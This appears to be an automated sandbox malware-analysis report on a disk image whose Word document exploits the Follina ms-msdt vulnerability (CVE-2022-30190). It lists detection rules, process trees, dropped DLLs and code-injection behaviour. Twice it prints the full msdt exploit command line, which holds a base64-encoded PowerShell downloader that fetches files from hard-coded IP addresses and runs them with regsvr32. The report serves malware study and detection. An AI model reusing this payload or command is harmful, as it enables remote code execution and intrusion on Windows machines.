                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008C358D
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008C2988
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008C8240
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008C670F
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008C6350
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049C358D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049C2988
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049C8240
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049C670F
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049C6350
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AB2988
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AB358D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AB8240
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AB670F
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AB6350
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_04822988
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0482358D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_04828240
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0482670F
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_04826350
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049BD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049BD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AAD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AAD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0481D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0481D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
                          Source: DiagPackage.dll.19.drStatic PE information: No import functions for PE file found
                          Source: DiagPackage.dll.mui.19.drStatic PE information: No import functions for PE file found
                          Source: DiagPackage.dll.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DiagPackage.dll.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DiagPackage.dll.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dll
                          Source: unknownDriver loaded: C:\Windows\System32\drivers\udfs.sys
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "E:\doc276.docx" /o "
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
                          Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                          Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                          Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
                          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220607Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c33guzif.vqh.ps1Jump to behavior
                          Source: classification engineClassification label: mal84.troj.expl.evad.winIMG@27/33@0/1
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BE400 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.ini
                          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049BB96A CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,
                          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{EED88676-5DBA-42BA-A514-EEBD7864A628}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_01
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
                          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                          Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                          Source: 68101181_048154.imgStatic file information: File size 2686976 > 1048576
                          Source: Binary string: amstream.pdb source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008CB02E push ebx; ret
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008B01B0 pushad ; iretd
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008CAD7C push cs; iretd
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008CAE7E push cs; iretd
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008CCB5D push esi; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049CB02E push ebx; ret
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049B01B0 pushad ; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049CAD7C push cs; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049CAE7E push cs; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049CCB5D push esi; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04ABB02E push ebx; ret
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AA01B0 pushad ; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04ABAD7C push cs; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04ABAE7E push cs; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04ABCB5D push esi; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0482B02E push ebx; ret
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_048101B0 pushad ; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0482AD7C push cs; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0482AE7E push cs; iretd
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0482CB5D push esi; iretd
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BEEBB LoadLibraryA,GetProcAddress,
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.muiJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.muiJump to dropped file

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6956 base: CDF380 value: E9 40 6E E4 FF
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6936 base: CDF380 value: E9 40 6E 5B 02
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5012 base: CDF380 value: E9 40 6E A3 FF
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
